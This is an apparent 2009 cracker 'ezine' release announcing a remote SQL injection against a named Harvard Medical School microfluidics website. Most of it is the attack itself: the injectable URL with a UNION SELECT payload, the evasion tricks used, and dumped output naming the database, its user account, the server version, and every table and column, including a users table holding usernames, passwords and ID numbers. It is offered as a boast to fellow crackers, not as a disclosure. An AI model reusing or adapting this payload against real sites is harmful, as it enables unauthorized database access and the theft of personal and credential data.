┌┌───────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ [ EZINE ] ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : : : │ Website : harvard.edu │ │ Famous Sites Can Be │ │ Vuln Type: Remote SQL Injection │ │ │ │ Method : GET │ │ Olso Vulned │ │ Critical : High [░░▒▒▓▓██] │ │ │ │ Impact : Database access │ │ │ │ ────────────────────────────────────┘ └─────────────────────────────────── │ │ DALnet #crackers ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘ [+] Remote SQL http://microfluidics.hms.harvard.edu/index.php?catid=-1 union select 1,database(),3-- [+] Attack Results [+] URL:http://microfluidics.hms.harvard.edu/index.php?catid=-1+union+select+1,Attack,3-- [+] Evasion Used: "+" "--" [+] 05:33:35 [+] Gathering MySQL Server Configuration... Database: MICROFLUIDICS User: MICROFLDCSWEB@CORNET.CL.MED.HARVARD.EDU Version: 5.0.45-DEBIAN_1~BPO.1-LOG [+] Showing Tables & Columns from database "MICROFLUIDICS" [+] Number of Tables: 11 [Database]: MICROFLUIDICS [Table: Columns] [0]HMS_CONTENT_LEAF: NID,TABLE_NAME [1]HMS_EQUIPMENT: ID,NAME,IMAGE_PATH1,IMAGE_PATH2,IMAGE_PATH3,IMAGE_PATH4,PDF_PATH1,PDF_NAME1,PDF_PATH2,PDF_NAME2,PDF_PATH3,PDF_NAME3,PDF_PATH4,PDF_NAME4,DESC_LONG,USE_TYPE,MAX_USERS,MAX_HOURS,MIN_HOURS,MIN_USER_STATUS [2]HMS_EVENTS: ID,DATE_TIME,NAME,HOST,LOCATION,NUM_SLOTS,DESC_LONG [3]HMS_FEATURES: ID,IMG_PATH,TITLE,CAPTION,LINK,PAUSE [4]HMS_REGS: EID,UID [5]HMS_RESERVATIONS: UID,EID,START,END,VERIFIED [6]HMS_SEMINARS: ID,DATE_TIME,NAME,HOST,DESC_LONG,LOCATION [7]HMS_SESSIONS: SESSION_ID,SESSION_DATA,EXPIRES [8]HMS_SITE_CONTENT: ID,CATID,LINK_NAME,TITLE,DESC_LONG,EDIT_TYPE,IS_TOP_PAGE [9]HMS_SITE_SECTIONS: ID,LABEL,RANK,PUBLIC [10]HMS_USERS: ID,USERNAME,PASSWORD,NAME_FIRST,NAME_LAST,TITLE,AFFILIATION,DEPARTMENT,LAB,PHONE,FAX,ADDRESS,EMAIL,HMS_STATUS,BILLING_CODE,HUID,HUID_EXP,FINANCE_NAME_FIRST,FINANCE_NAME_LAST,FINANCE_PHONE,FINANCE_EMAIL,AGREEMENT_STATUS,APPROVAL_STATUS,ACTIVE_STATUS [-] [05:35:30] [-] Total URL Requests 89 [-] Done └────────────────────────────────────────────────────────────────────────────┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL . ┌┌───────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2009 ┌┘ └───────────────────────────────────────────────────────────────────────────┘┘